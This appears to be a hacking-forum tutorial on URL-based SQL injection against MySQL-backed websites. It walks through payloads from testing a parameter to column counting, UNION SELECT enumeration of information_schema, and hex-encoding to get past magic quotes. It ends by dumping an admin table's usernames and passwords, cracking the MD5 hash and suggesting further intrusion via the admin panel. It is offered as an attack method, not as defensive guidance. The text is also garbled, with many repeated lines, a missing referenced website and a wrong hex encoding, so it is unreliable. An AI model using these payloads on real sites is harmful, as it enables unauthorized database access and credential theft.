Advance SQL Injection : Url Based
The first thing we have to figure out is, ‘when is a site vulnerable to SQL injection or not?’
We can do this a few ways, depending on what kind of SQL injection types we know.
We can do this a few ways, depending on what kind of SQL injection types we know.
Some examples for how to figure out if it’s vulnerable or not to basic SQLi:
· Place an ‘ behind the last part of the URL.
If you get something similar to the following errors:
· You have an error in your SQL syntax
· Warning: mysql_fetch_array():
· Warning: mysql_fetch_assoc():
· Warning: mysql_numrows():
· Warning: mysql_num_rows():
· Warning: mysql_result():
· Warning: mysql_preg_match():
Or anything similar to this, it IS vulnerable to SQL Injection , about 95% of the time, you will face common errors as well.
n There are more ways to tell if it’s vulnerable. If it doesn’t throw out an error on simple SQL injection attacks: that’s by checking if images or other things are missing on the page, sometimes when the SQL error’s out it will be unable to call certain images and they won’t show, this is a great example to see if it’s vulnerable too, if your page is missing text / has less displayed than before.
So keep your eyes open to see if your target is SQL injectable.
Exploiting a simple SQL vulnerability.
As this covers the first part, you will always want to start off with the most absolute BASIC of SQLi.
Ways of exploiting common SQL injection points:
n Find out if it’s vulnerable (Check Chapter 1)
Next what we want to do is know how many columns we are working with on their current database to extract information that we want.
There are multiple ways to check how many columns there are for SIMPLE SQL injection.
1. Order by
2. Procedure analyze
3. Group by
n Example: If we use group by a certain number, and its wrong it will state: Unknown column “21” in group count – however if it’s the right amount of columns it will spit out: Can’t group on “count”
Order by will work as follows, let’s say we have a vulnerable site that has 20 columns.
www.site.com/view.php?id=25 order by 19—will show the page, still no errors.
www.site.com/view.php?id=25 order by 20 – will show the page still…
www.site.com/view.php?id=25 order by 21 – This can give multiple errors like:
www.site.com/view.php?id=25 order by 20 – will show the page still…
www.site.com/view.php?id=25 order by 21 – This can give multiple errors like:
n Unknown column “21” in ‘order’ clause
Now that we figured out how many columns our target has, we can start exploiting it.
We want to explore which number(s) are showing up on the page.
We will do that by the following query:
www.site.com/view.php?id=25 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
With the query we just entered, numbers may or may not pop up on the page. If none pop up, first thing we will do is check out the source of the page, and search for numbers. If you’re not certain if that’s just a number from the website itself or our query, do the following:
We want to explore which number(s) are showing up on the page.
We will do that by the following query:
www.site.com/view.php?id=25 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
With the query we just entered, numbers may or may not pop up on the page. If none pop up, first thing we will do is check out the source of the page, and search for numbers. If you’re not certain if that’s just a number from the website itself or our query, do the following:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,16,17,18,19,20—
We are telling the server that 1 equals 0, which in mathematical terms is not true, which forges our query to return false, which will then error out our request, in 90% of the occasions it will now show your columns.
Now that you found the column numbers on the page itself, pick a number which you find the easiest to see / find on the website (that pops out of the page at you).
Let’s say in the example I have chosen the version of the MySQL they are running on is 5.
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20—
This query will show us the exact version of MySQL they are running which is fairly important, since MySQL comes mostly in 2 flavours, either version 4 or 5 (yes there are lower versions, but finding those is like finding a needle in a haystack), A quick explanation on that, 4 has no information_schema table. Therefor you either have to guess table / column names, or you would have to brute force them with a wordlist or something similar.
Now to exploit our site:
We need to know what tables our target database has, for that query we can use information_schema 90% of the time (unless you’re on MySQL 4), to do so we use the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables—
In this query we used concat which is a statement in SQL that “concatenates” the amount that’s in the table / columns.
We have the following functions to grab all the data from either a table or column:
1. Concat
2. Concat_ws
n Concat_ws stands for concat with separator, which is able to use as following:
Concat_ws(‘:’,username,password) This function will put our separator the : sign between every upcoming column / table we select.
3. Group_concat
n Group_concat will return all strings within a certain group.
As we do this query it may result in showing all of the table names from a certain database or it might just show you 1 out of all of them, or it might show a really big mess.
Therefore we will change the query to make sure we can view it as best as possible:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables—
Which results in showing the table names with a little separator sign, therefore easier to read.
What if you CAN’T view all of the tables? There are a few tricks for this:
1. Limit (Limit says what it does and limits it to the users request, to use this in a query we use it as: LIMIT 1,1-- , at the end of the query we did. This will show your table names 1 by 1, and can be used for any table / column or data you try it on. By increasing the first number to a larger one like 2,1 3,1 4,1 etc we will see the table / column / data that’s on the 2nd row or more.
Now that we know our tables name’s you might find something like users, or maybe something like admin, now we want to see all the columns within that certain table, we do that with the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=’admin’—
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=’admin’—
What we did here is, we requested all the columns in the admin table, from information_schema as that table holds an internal map of the database (tables / columns etc.)
Doing it like this might give you an error because of the php settings for the server (hosting admin), if magic quote’s is on we will need hex encoding to bypass it.
What we need:
Doing it like this might give you an error because of the php settings for the server (hosting admin), if magic quote’s is on we will need hex encoding to bypass it.
What we need:
We simply put in the name of the database we want, which was ‘admin’ in the example.
Which will output for us: 61646d96e
However for this to work 100% we need to add: 0x before our numbers. Which would result in this query:
Which will output for us: 61646d96e
However for this to work 100% we need to add: 0x before our numbers. Which would result in this query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x61646d96e—
Now that it’s showing all of the information from the table, and we know which columns we are working with, we want to get to the data they store!
In my example we will use the following:
ID – Admin – Name – Fullname – Password – Email
ID – Admin – Name – Fullname – Password – Email
As you see we want a certain amount of info from that table, personally I would go for Admin and Password, which we use the following query to obtain:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,Admin,Password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from Admin—
Which will tell the server that we are requesting the data stored in the ‘Admin’ table, outputting something similar to this:
Admin: 21232f297a57a5a743894a0e4a801fc3
Some of you might be confused now, but the passwords is encrypted with MD5, therefore we can use either public or private md5 crackers. Either online or programs, I will show you 1 of my favorite websites to crack with:
Some of you might be confused now, but the passwords is encrypted with MD5, therefore we can use either public or private md5 crackers. Either online or programs, I will show you 1 of my favorite websites to crack with:
If we entered the hash we will see that our Administrators information is:
Username: Admin – Password: admin
Username: Admin – Password: admin
Now to hack further into it, you will need to scan the website or guess to find the admin panel, HINT: Some website have older database’s that are just out of use so the password MIGHT not always work.
Tips & Tricks making your numbers visible:
1. 1=0
2. 1=2
3. DIV by 0
4. 99999999
5. Using the – sign before the number